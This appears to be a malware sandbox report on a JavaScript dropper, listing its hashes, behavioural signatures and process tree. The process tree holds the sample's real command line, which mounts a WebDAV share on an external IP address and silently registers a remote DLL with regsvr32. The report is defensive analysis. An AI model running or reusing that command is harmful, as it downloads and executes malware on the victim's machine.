Analysis
-
max time kernel
133s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24-07-2024 02:21
Static task
static1
Behavioral task
behavioral1
Sample
19028118422498350.js
Resource
win7-20240705-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
19028118422498350.js
Resource
win10v2004-20240709-en
windows10-2004-x64
5 signatures
150 seconds
General
-
Target
19028118422498350.js
-
Size
5KB
-
MD5
790010d2de10be9efabde1b4f87cc2f4
-
SHA1
df5ff0c42bd4f6441f5265d1d64e5ad6aa59c143
-
SHA256
9eeef8fa997320dd8cdbe847e1bef8ae2a10709cc7ccb5585b7f429f83a1c28c
-
SHA512
c99912c06b5e24344d65a5b05f0a22a918a48e9bc74f4545d971e2fd6426f53dd98f647e89277af79e6ea89cd5f01b840ebb10cdadc62b3bb6dc82682226fe2d
-
SSDEEP
96:qrsxfjaTaYhdIKMW8wnuKG5zONAkbybONa:KsxfOeYhdIKMDwtG5zsAkbybsa
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3876 wrote to memory of 336 3876 wscript.exe 84 PID 3876 wrote to memory of 336 3876 wscript.exe 84 PID 336 wrote to memory of 4352 336 cmd.exe 86 PID 336 wrote to memory of 4352 336 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\19028118422498350.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\114661144227600.dll2⤵
- Suspicious use of WriteProcessMemory
PID:336 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:4352
-
-